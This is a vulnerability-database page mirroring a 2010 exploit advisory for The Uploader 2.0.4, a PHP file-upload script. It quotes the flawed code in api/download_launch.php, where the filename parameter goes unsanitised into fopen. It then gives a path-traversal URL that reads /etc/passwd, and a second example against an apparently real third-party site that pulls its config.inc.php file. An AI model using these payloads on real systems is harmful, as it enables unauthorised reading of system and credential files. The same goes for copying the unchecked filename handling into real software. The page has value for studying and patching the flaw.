Lucene search
K

The Uploader 2.0.4 File Disclosure

🗓️ 23 Jun 2010 00:00:00Reported by Xa7m3dType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 35 Views

The Uploader 2.0.4 File Disclosure Vulnerability in api/download_launch.php allows unauthorized access to files

Code
`  
  
  
=================================================  
The Uploader 2.0.4 Remote File disclosure Vulnerability  
=================================================  
  
==============================================  
  
# Script Name : The Uploader  
# Version : [2.0.4]  
# Language : php  
# Author : Xa7m3d ([email protected])  
# Download : http://sourceforge.net/projects/theuploader  
# Tested on : ubuntu 9.10  
  
==============================================  
  
File Disclosure :  
in : api/download_launch.php  
  
#######################################  
$open=fopen($main['upload_directory'] . $_GET['filename'], "r"); <−−(+)  
$size=filesize($main['upload_directory'] . $_GET['filename']);  
$read=fread($open, $size);  
header("Content-Type: application/octet-stream");  
header("Content-Length: " . $size);  
header("Content-Transfer-Encoding: binary");  
header("Content-Disposition: attachment; filename=" . $_GET['filename']); <−−(+)  
#######################################   
  
3XP :  
  
api/download_launch.php?filename=../../../../../etc/passwd  
  
Example :  
  
http://www.busut.it/theuploader/api/download_launch.php?filename=../config.inc.php  
  
  
T3AM Piracy Unlimited Tunisia : # Cyb3R H3LL # k[i]ng # La Haft Xroy #  
  
  
_________________________________________________________________  
Votre messagerie et bien plus où que vous soyez. Passez à Windows Live Hotmail, c'est gratuit !  
https://signup.live.com/signup.aspx?id=60969  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jun 2010 00:00Current
7.4High risk
Vulners AI Score7.4
35